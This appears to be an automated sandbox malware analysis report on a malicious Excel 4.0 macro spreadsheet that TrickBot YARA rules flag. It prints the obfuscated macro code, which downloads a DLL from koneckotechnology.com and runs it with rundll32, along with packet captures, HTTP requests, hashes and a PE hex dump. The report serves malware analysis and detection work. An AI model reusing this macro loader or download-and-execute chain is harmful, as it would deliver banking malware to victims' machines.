                                      MD5:3BB9FE6B7E6B4D9C3A3C83DE6AACD952
                                      SHA1:57C343AE5E95FE702B759737522E85FE9E97FE5E
                                      SHA-256:697DEA4B154178E8DE096C66167B539AA4465155D294B11765F1A1886EB7C56D
                                      SHA-512:1E98417C6C48E0BF405AE5FEDA4193C91A3B385F387F33D79FBA3DC6F7AA7571444885E6628B7CA6075887BFBEC3BD17E0782C11A1C45A7D4B1A139849CA4DF0
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 13%
                                      Joe Sandbox View:
                                      • Filename: 59c9f346_by_Libranalysis.xls, Detection: malicious, Browse
                                      • Filename: c527325d_by_Libranalysis.xls, Detection: malicious, Browse
                                      Reputation:low
                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g]..#<.#<.#<.4..)<....%<.04..!<.&0..8<.&0...<.#<.b>.4..0<.&0..W<.&0.."<..7.."<.&0.."<.Rich#<.................PE..L......`...........!.........@.......................................................................................>..E...\!..........|....................p...4......................................H.................... ..@....................text....x.......................... ..`.rdata..U...........................@..@.data....Y...@...0...@..............@....rsrc...|............p..............@..@.reloc.......p.......@..............@..B........................................................................................................................................................................................................................................................................................................

                                      Static File Info

                                      General

                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5465, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 13:44:28 2021, Security: 0
                                      Entropy (8bit):3.2168699589694834
                                      TrID:
                                      • Microsoft Excel sheet (30009/1) 78.94%
                                      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                      File name:SecuriteInfo.com.Heur.32219.xls
                                      File size:283648
                                      MD5:1ce9bb4784ef70cd5d09291a5005ab51
                                      SHA1:f4c3e4d7be3e6855c0272b0c2f3a2833bd6963a1
                                      SHA256:dfae46a2c8083b6cf4f91691289ca97cbcc002126058a2900f09564edccffdfb
                                      SHA512:da8a19266f2fc2be4693746961d4ad80f7da10d4956e315c6a8b89d500383c563300ca456c85680bc660783f5e570ccc447840ccdd20931cec57065c9988022a
                                      SSDEEP:6144:ncPiTQAVW/89BQnmlcGvgZ7rDjo88B3cvJK+6mFK:tkK
                                      File Content Preview:........................>.......................(...........................#...$...%...&...'..................................................................................................................................................................

                                      File Icon

                                      Icon Hash:e4eea286a4b4bcb4

                                      Static OLE Info

                                      General

                                      Document Type:OLE
                                      Number of OLE Files:1

                                      OLE File "SecuriteInfo.com.Heur.32219.xls"

                                      Indicators

                                      Has Summary Info:True
                                      Application Name:Microsoft Excel
                                      Encrypted Document:False
                                      Contains Word Document Stream:False
                                      Contains Workbook/Book Stream:True
                                      Contains PowerPoint Document Stream:False
                                      Contains Visio Document Stream:False
                                      Contains ObjectPool Stream:
                                      Flash Objects Count:
                                      Contains VBA Macros:True

                                      Summary

                                      Code Page:1251
                                      Last Saved By:5465
                                      Create Time:2006-09-16 00:00:00
                                      Last Saved Time:2021-05-12 12:44:28
                                      Creating Application:Microsoft Excel
                                      Security:0

                                      Document Summary

                                      Document Code Page:1251
                                      Thumbnail Scaling Desired:False
                                      Contains Dirty Links:False

                                      Streams

                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                      General
                                      Stream Path:\x5DocumentSummaryInformation
                                      File Type:data
                                      Stream Size:4096
                                      Entropy:0.305356156469
                                      Base64 Encoded:False
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . { . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 7b 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                      General
                                      Stream Path:\x5SummaryInformation
                                      File Type:data
                                      Stream Size:4096
                                      Entropy:0.2540711905
                                      Base64 Encoded:True
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . P . . . . . . . h . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 4 6 5 . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . , G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 88 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 50 00 00 00 0c 00 00 00 68 00 00 00 0d 00 00 00 74 00 00 00 13 00 00 00 80 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00 35 34 36 35 00 00 00 00
                                      Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 271852
                                      General
                                      Stream Path:Book
                                      File Type:Applesoft BASIC program data, first line number 8
                                      Stream Size:271852
                                      Entropy:3.18811060737
                                      Base64 Encoded:True
                                      Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 4 6 5 B . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . . H A L T . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . _ . . . . . . . . . . . . . . . . .
                                      Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 04 35 34 36 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                      Macro 4.0 Code

                                      ,,,,,,,,,,"=WORKBOOK.DELETE(""Sheet1"")=WORKBOOK.DELETE(""Sheet2"")=WORKBOOK.DELETE(""Sheet3"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=""""&""""&""""&""""&""""&""""&""""&""""&""""&CALL(""U""&before.2.8.95.sheet!CZ24&before.2.8.95.sheet!CZ25&before.2.8.95.sheet!CZ26&before.2.8.95.sheet!CZ27&""n"",""UR""&before.2.8.95.sheet!DA25&before.2.8.95.sheet!DA26&before.2.8.95.sheet!DA27&Sheet3!BC38&Sheet3!BC39&Sheet3!BC40&Sheet3!BC41&Sheet3!BC42&Sheet3!BC43&Sheet3!BC44&Sheet3!BC45&Sheet3!BC46&Sheet3!BC47&Sheet3!BC48&Sheet3!BC49&Sheet3!BC50,Sheet3!BG18&Sheet3!BG19&Sheet3!BG20&Sheet3!BG21,0,Sheet3!BH18&Sheet3!BH19&Sheet3!BH20&Sheet3!BH21,Sheet3!BH28,0,0)",,,,,,,,,,,,,,,,,,,,,=GOTO(before.2.8.95.sheet!DM21),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&EXEC(""ru""&before.2.8.95.sheet!DC25&before.2.8.95.sheet!DC26&before.2.8.95.sheet!DC27&Sheet3!BD38&Sheet3!BD39&Sheet3!BD40&Sheet3!BD41&Sheet3!BH28&Sheet3!BF17&Sheet3!BF18&Sheet3!BF19&Sheet3!BF20&Sheet3!BF21&Sheet3!BE38&Sheet3!BE39)=RUN(before.2.8.95.sheet!DB8)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)=ASIN(4518181515151510)=COS(54111551)=ACOS(54515151)=ACOS(54418415151515100)",,,,,,,,"=""L""","=""L""",,"=""n""",,,,,,,,,,,,,,,,,,"=""M""","=""D""",,"=""d""",,,,,,,,,,,,,,,,,,"=""o""","=""o""",,"=""l""",,,,,,,,,,

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      May 13, 2021 01:49:19.007529020 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.199886084 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.200042963 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.201585054 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.398214102 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.398264885 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.398307085 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.398344994 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.398394108 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.398413897 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.398437977 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.398479939 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.398519993 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.398545027 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.398560047 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.398598909 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.398610115 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.398654938 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.408710957 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.589345932 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.589375019 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.589409113 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.589426994 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.589443922 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.589463949 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.589483023 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.589500904 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.589515924 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.589533091 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.589544058 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.589555979 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.589575052 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.589589119 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.589622974 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.591902971 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.780241966 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.780404091 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.780421972 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.780472040 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.780494928 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.780512094 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.780519009 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.780541897 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.780554056 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.780567884 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.780591011 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.780607939 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.780620098 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.780626059 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.780658007 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.780679941 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.780704975 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.780729055 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.780750036 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.780771971 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.780797958 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.780828953 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.783087015 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.973150969 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973191023 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973216057 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973242044 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973268986 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973294020 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973320007 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973345041 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973356962 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.973370075 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973414898 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973431110 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.973443985 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973472118 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973476887 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.973500013 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973511934 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.973525047 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973550081 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973552942 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.973575115 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973587990 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.973599911 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973625898 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973637104 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.973654032 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973678112 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973680019 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.973712921 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.973730087 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973757982 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:19.973783016 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.973809958 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:19.975495100 CEST4916580192.168.2.22198.54.114.131
                                      May 13, 2021 01:49:20.165901899 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:20.165930986 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:20.165946960 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:20.165963888 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:20.165983915 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:20.166002989 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:20.166016102 CEST8049165198.54.114.131192.168.2.22
                                      May 13, 2021 01:49:20.166029930 CEST8049165198.54.114.131192.168.2.22

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      May 13, 2021 01:49:18.931201935 CEST5219753192.168.2.228.8.8.8
                                      May 13, 2021 01:49:18.989450932 CEST53521978.8.8.8192.168.2.22

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      May 13, 2021 01:49:18.931201935 CEST192.168.2.228.8.8.80xccaeStandard query (0)koneckotechnology.comA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      May 13, 2021 01:49:18.989450932 CEST8.8.8.8192.168.2.220xccaeNo error (0)koneckotechnology.com198.54.114.131A (IP address)IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • koneckotechnology.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.2249165198.54.114.13180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      TimestampkBytes transferredDirectionData
                                      May 13, 2021 01:49:19.201585054 CEST0OUTGET /netmons.dll HTTP/1.1
                                      Accept: */*
                                      UA-CPU: AMD64
                                      Accept-Encoding: gzip, deflate
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                      Host: koneckotechnology.com
                                      Connection: Keep-Alive
                                      May 13, 2021 01:49:19.398214102 CEST2INHTTP/1.1 200 OK
                                      date: Wed, 12 May 2021 23:49:19 GMT
                                      server: Apache
                                      last-modified: Wed, 12 May 2021 13:22:52 GMT
                                      accept-ranges: bytes
                                      content-length: 643072
                                      content-type: application/x-msdownload
                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 5d 9f e5 23 3c f1 b6 23 3c f1 b6 23 3c f1 b6 a0 34 ae b6 29 3c f1 b6 d9 1f e8 b6 25 3c f1 b6 30 34 ac b6 21 3c f1 b6 26 30 fe b6 38 3c f1 b6 26 30 ae b6 a9 3c f1 b6 23 3c f0 b6 62 3e f1 b6 a0 34 ac b6 30 3c f1 b6 26 30 91 b6 57 3c f1 b6 26 30 ad b6 22 3c f1 b6 cf 37 af b6 22 3c f1 b6 26 30 ab b6 22 3c f1 b6 52 69 63 68 23 3c f1 b6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c1 ab 9b 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 07 0a 00 80 02 00 00 40 07 00 00 00 00 00 9a f2 00 00 00 10 00 00 00 90 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 3e 03 00 45 00 00 00 5c 21 03 00 04 01 00 00 00 a0 03 00 7c cf 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 09 00 80 34 00 00 a0 95 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 e6 02 00 48 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 94 05 00 00 d4 20 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 78 02 00 00 10 00 00 00 80 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 55 ae 00 00 00 90 02 00 00 b0 00 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 59 00 00 00 40 03 00 00 30 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c cf 05 00 00 a0 03 00 00 d0 05 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 04 81 00 00 00 70 09 00 00 90 00 00 00 40 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$g]#<#<#<4)<%<04!<&08<&0<#<b>40<&0W<&0"<7"<&0"<Rich#<PEL`!@>E\!|p4H @.textx `.rdataU@@.dataY@0@@.rsrc|p@@.relocp@@B


                                      Code Manipulations

                                      Statistics

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Start time:01:48:40
                                      Start date:13/05/2021
                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      Wow64 process (32bit):false
                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                      Imagebase:0x13f500000
                                      File size:27641504 bytes
                                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:01:48:45
                                      Start date:13/05/2021
                                      Path:C:\Windows\System32\rundll32.exe
                                      Wow64 process (32bit):false
                                      Commandline:rundll32 ..\hsdksksk.iem,StartW
                                      Imagebase:0xff1d0000
                                      File size:45568 bytes
                                      MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:01:48:46
                                      Start date:13/05/2021
                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                      Wow64 process (32bit):true
                                      Commandline:rundll32 ..\hsdksksk.iem,StartW
                                      Imagebase:0x740000
                                      File size:44544 bytes
                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2100678651.0000000000470000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2100567095.00000000002C0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2100613239.00000000003A4000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2100649939.00000000003E1000.00000020.00000001.sdmp, Author: Joe Security
                                      Reputation:high

                                      General

                                      Start time:01:48:47
                                      Start date:13/05/2021
                                      Path:C:\Windows\System32\wermgr.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\wermgr.exe
                                      Imagebase:
                                      File size:50688 bytes
                                      MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Disassembly

                                      Code Analysis

                                      Reset < >